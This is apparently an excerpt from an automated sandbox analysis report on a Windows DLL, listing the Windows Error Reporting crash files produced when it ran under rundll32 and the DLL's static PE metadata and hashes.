                                                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.6.9.7.4.6.5.2.7.8.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.6.9.8.7.9.9.8.4.7.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.d.6.e.5.5.0.2.-.6.2.d.e.-.4.2.b.b.-.a.e.2.3.-.a.a.e.f.8.9.1.a.5.5.9.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.a.a.e.a.0.8.8.-.c.8.0.f.-.4.6.7.d.-.b.8.0.a.-.0.6.a.8.c.8.6.1.b.4.a.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.1.8.-.0.0.0.1.-.0.0.1.c.-.1.9.7.c.-.0.1.b.4.3.9.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_58e47b16956767aaab6459884ff9566934c5f_82810a17_19a35deb\Report.wer
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):12042
                                                                                                                                  Entropy (8bit):3.7643918212913916
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:PfiK0oXeHBUZMX4jed+x/u7slS274It7cC:XicXWBUZMX4jec/u7slX4It7cC
                                                                                                                                  MD5:CB8C1162189141C8D0620A9063BB666C
                                                                                                                                  SHA1:D3CA28C63DDA153B6D9EF4987F6B043D2E5B8357
                                                                                                                                  SHA-256:4BE2E5996C3969D33E6ABAC03911052218171F4B7ECD023D5DC2C4D4C5995D96
                                                                                                                                  SHA-512:2E9F16738E0B9F9C1A0FEE9D39335A81EFB28CC5F9A5EA27674907B227B05B6995EA01D2CA3692A48E7B4359717C28F7113FBAD38F85F5EA8F94262A6EFAE069
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.6.9.7.1.3.4.3.1.4.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.6.9.8.3.8.5.1.5.2.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.d.d.6.0.4.e.-.e.6.c.9.-.4.c.6.e.-.b.d.f.e.-.7.b.9.7.3.d.8.6.f.9.b.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.b.3.9.9.5.c.d.-.0.2.e.c.-.4.a.4.d.-.8.0.2.b.-.9.b.7.a.2.6.7.8.0.b.6.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.a.8.-.0.0.0.1.-.0.0.1.c.-.c.d.2.5.-.7.3.a.f.3.9.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_7dd26a4e42a9ea9789d8aeb01848b51c1493e55_82810a17_14578029\Report.wer
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):12042
                                                                                                                                  Entropy (8bit):3.763797961621953
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:WhiF0oXaHKUgO+SQsjed+x/u7slS274It7c5:ciLXyKUgO+SQsje8/u7slX4It7c5
                                                                                                                                  MD5:40B6A8CBA1D2905400E1254929C70D50
                                                                                                                                  SHA1:3C0622CCC3FBCDD3880325B3C6613095E852F030
                                                                                                                                  SHA-256:2A62F6CF1EE2B61A4D275248936C5DFC9024157FDC8CE9C623E0225123E059FB
                                                                                                                                  SHA-512:3B6982E95890F97800B9AC04A27312BA4D3D90C6F3EA6A265CA7960BC238FE647EC88ED8DA66517C24DC5B5B2AA4EEFC083E1DCBEFC1C581FB55E9B09F68AD71
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.6.9.8.5.6.1.5.9.0.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.6.9.9.3.4.6.9.4.0.9.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.d.a.e.8.4.e.3.-.d.4.8.f.-.4.c.3.e.-.a.0.f.1.-.8.8.c.c.1.3.c.a.8.2.e.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.a.b.2.3.7.4.-.9.2.a.b.-.4.5.d.5.-.a.e.e.4.-.e.9.f.c.e.3.3.4.6.8.6.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.2.8.-.0.0.0.1.-.0.0.1.c.-.1.f.1.a.-.6.f.b.1.3.9.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERAFBA.tmp.dmp
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:22:54 2021, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):34942
                                                                                                                                  Entropy (8bit):2.4371667427565704
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:oTdPExlXjMCQ1IDZc1qbND3z4aQwnCHOv4lX8G:/FQCQac1E3UaQwj4lz
                                                                                                                                  MD5:FD984E1914EC2F5D330FBDED764088F8
                                                                                                                                  SHA1:3D6F67ED6643C12253DE73C23904C772A2377380
                                                                                                                                  SHA-256:5B44DC06C22BEE12F94FF2DC9F48899F7DA462764534A55BA0772C731D18E3AE
                                                                                                                                  SHA-512:5D9EC660DDA7BF5FBACE1C8A337F89F2B08A27CB0A6498674E084E867481C0EC89A610248077357EB8C37AC5EE9F3708D58568DB8FFB6DB88ACFDCD3BDC44AD1
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MDMP....... ........7ea...................U...........B..............GenuineIntelW...........T...........R7ea"............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC9B.tmp.dmp
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:23:03 2021, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):35266
                                                                                                                                  Entropy (8bit):2.375122475405865
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:IIFVNBmoRklXjMCQ1IDZcWqB6tt4lMb4kTYo82:9B2QCQacWJt6lMDbP
                                                                                                                                  MD5:74BEE0FAD6A4C982C6508E8EC4B63E72
                                                                                                                                  SHA1:DC40D3ACADD2ED57D715D78D583AFAD0315A2999
                                                                                                                                  SHA-256:2AAEFF347370B9C75FA33E4D261272382A08124C11B1C737D046ED13FE39F744
                                                                                                                                  SHA-512:4AD02B32D0CD585DED820105641EBD2538F3A45FC14CA5ED48E943B73BD422791FBD486899ACDDABFB0C4A047025CF611F99C6411630C5B95F427A82591F1E6F
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MDMP....... ........7ea...................U...........B..............GenuineIntelW...........T...........Z7ea!............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERBDA5.tmp.WERInternalMetadata.xml
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8410
                                                                                                                                  Entropy (8bit):3.6994283201386104
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:Rrl7r3GLNi2c6fw6YoS6yVt33Qgmf8NSkCprM89b+Asf4qm:RrlsNi96Y6YN6yVt33Qgmf8NSF+Tfk
                                                                                                                                  MD5:83B27B3137004DE49BF0D594ACF580DF
                                                                                                                                  SHA1:978D213E573BD27560CB9FFA56856C23B26258C7
                                                                                                                                  SHA-256:7A5F0D8F95F84C7C555784AF4444D1A36D487A3C0FF81A016B462AAD055C4E3F
                                                                                                                                  SHA-512:FB18C99471308C16F34AB0E18F6C85C7013BC5F9862DCB40E13A83DC45D4AD7E1E859251A777CC7790A3DD1ABF3CB2D3E873A75D5FF519AB6669550B11E47921
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.5.2.0.<./.P.i.d.>.......
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC1EC.tmp.xml
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4771
                                                                                                                                  Entropy (8bit):4.4851490486417
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwSD8zs1JgtWI9J1WSC8Bw8fm8M4JCdsPMFVho+q8vjsPJj4SrSchd:uITfPCESNHJdwWKmJjDW4d
                                                                                                                                  MD5:184F4DEE9908C2C8BBC88B76727AA2D3
                                                                                                                                  SHA1:15E5EA4956686C4B0ACC8AB55D7517EEA4A466F1
                                                                                                                                  SHA-256:22B58501E81654B15E3536A9BBA37C36007046AA0024FE02FEC764CE3C2411CB
                                                                                                                                  SHA-512:0E7E11D9524AEC5ACE5DDFB1E69C74A888DA314279A5FD8A1E37D02FDEFDAABAAD38BF70D27BA0B2A8967CAE8E10140EDF12EF5B9D1E9C9D64993D7581BC5287
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206273" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERE198.tmp.WERInternalMetadata.xml
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8410
                                                                                                                                  Entropy (8bit):3.6983516689249325
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:Rrl7r3GLNi/Q6uE6YoM6AIcgmf8NSkCprK89bDxsfHBm:RrlsNio6uE6YT6Argmf8NSPDqfc
                                                                                                                                  MD5:1847F7A24426FD647D0FF897B4245F96
                                                                                                                                  SHA1:E4D20ACCF82E7281D7B47DBCB12378E25141B4CD
                                                                                                                                  SHA-256:C0295B80D920E451694C4EB4700567CECB1FF12F590DA8CC27B4C336EC7782EE
                                                                                                                                  SHA-512:680EF4121B851474F4A76302D99B60A716FD5E846BC19C4F0B53431B6BF40853F74118023061A373950FC41FF9930BAB9403B95B3BD79C9A010C59C8B8AF2CAB
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.3.6.<./.P.i.d.>.......
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERE773.tmp.dmp
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:23:09 2021, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):33278
                                                                                                                                  Entropy (8bit):2.4120363619214022
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:5MFvpC6fFXjMCQ1IDZc+qBF+PsIyQQGDTxlD:ivs6flQCQac+ZyKd9
                                                                                                                                  MD5:B2A646652F90E60B0A481B1BBA023237
                                                                                                                                  SHA1:10CE544E74E20CC967895E0AD9C0400190DEF800
                                                                                                                                  SHA-256:E4690AAABE533E407B2E35CC78D2225810EFE97102DDFB13B772F8419AAA932B
                                                                                                                                  SHA-512:17B57F6BCA5D32D83C52C51C7057A33F17550D0CF53828437726E30B6DFA736B13AEEA8F3AE1227FEC08C47AC4B52B2E2EA9A9565AE690C19D9E4E6247636818
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MDMP....... ........7ea...................U...........B..............GenuineIntelW...........T.......(...V7ea"............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERE7A4.tmp.xml
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4771
                                                                                                                                  Entropy (8bit):4.48311449717304
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwSD8zs1JgtWI9J1WSC8BX8fm8M4JCdsPMFK+q8vjsPps4SrSqd:uITfPCESNyJdvKmWDWqd
                                                                                                                                  MD5:5F9D3CFE40E9649972B503B7377A466D
                                                                                                                                  SHA1:FB046C647BF08B697DA3291998A0712AEA733140
                                                                                                                                  SHA-256:10A8E4A4D2FD4A0CDF212DABD557A63512C1FFAD220F441D934C771AD23CB20D
                                                                                                                                  SHA-512:72CA94891BC7A5A98BD387FA1CDF4BCAF9C14813AC4A7D3E0F70658A7E21866B3DB54F2A13533581EC522F3425F6CF472A8493CA292533E4DE0A07F090C6C802
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206273" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERF908.tmp.WERInternalMetadata.xml
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8410
                                                                                                                                  Entropy (8bit):3.6958658798372173
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:Rrl7r3GLNi9W6n0V6YoL6AIcgmf8wSjCprx89b2KsfMSm:RrlsNiM60V6YE6Argmf8wSl2pfI
                                                                                                                                  MD5:838AE79F4556503BDCE9A7ABD1907FE8
                                                                                                                                  SHA1:3728B41896A703AE2DD703E69FB9CF08354FA78A
                                                                                                                                  SHA-256:20AB74B222F0158178B22A8A946B372A94B5577FBFB08B0D785FDB863FACB58F
                                                                                                                                  SHA-512:3EDA37BC7BBECA1AB15941CBA7360BB112999D9BFEF0CFABD9FCEC8D9B5AFFF5A04D9F3B193E728835902E09E035655DFCB9F1810E47C67B186DCDAFBF26740C
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.5.2.<./.P.i.d.>.......
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE2A.tmp.xml
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4771
                                                                                                                                  Entropy (8bit):4.486211559507188
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwSD8zs1JgtWI9J1WSC8Bw8fm8M4JCdsqMFO+q8vjsqq4SrS9d:uITfPCESN/JE7K3qDW9d
                                                                                                                                  MD5:9B1980148D8913011A5202FC1293B9DC
                                                                                                                                  SHA1:264F234A834B74B10F8A46D0645C4514F91703B5
                                                                                                                                  SHA-256:6819D2AEB47EDE2E96339477CBC46A4E5FFB07836215215F39B0AE302D85C1AD
                                                                                                                                  SHA-512:D795F717C104F03B2D04BC8CB0ADFAACD1E3ACF9F8B6C66CBF98736269C0DDEF1F2E99C26E3987172FCF7096C41D502336C6B68B089762D59BEED96E0AC9BB8A
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206273" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Entropy (8bit):6.669953219927633
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:m87xfb63XU.dll
                                                                                                                                  File size:718336
                                                                                                                                  MD5:5aa733e108f0fa41df88cea0a309affe
                                                                                                                                  SHA1:ce79918ca7845f2163360ea40a251912998ea226
                                                                                                                                  SHA256:1be687a0453f23ea53b94a4447c926a9b4b6e01c2788e641b76eb4a5215bd960
                                                                                                                                  SHA512:e18ef98a6bb007ee0ef473cd05bad85ac2f177d316981658e17a12f182effbcc98754fbefc362a4212a8eebcc71fc2e2a15c865b08c50f5990223bcb55d001af
                                                                                                                                  SSDEEP:12288:VUAQSxn6fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XrGAsR:Vz3xn6fq8Np6bTPPaBreaZlYCOSVol2u
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}.W.}.W.}.Wy..W.}.W..}W.}.W...V.}.W...V.}.W...V.}.Wy..W.}.W.}.WH|.W...VK}.W...V.}.W...V.}.W.}qW.}.W...V.}.WRich.}.W.......

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:74f0e4ecccdce0e4

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x1003ab77
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x10000000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
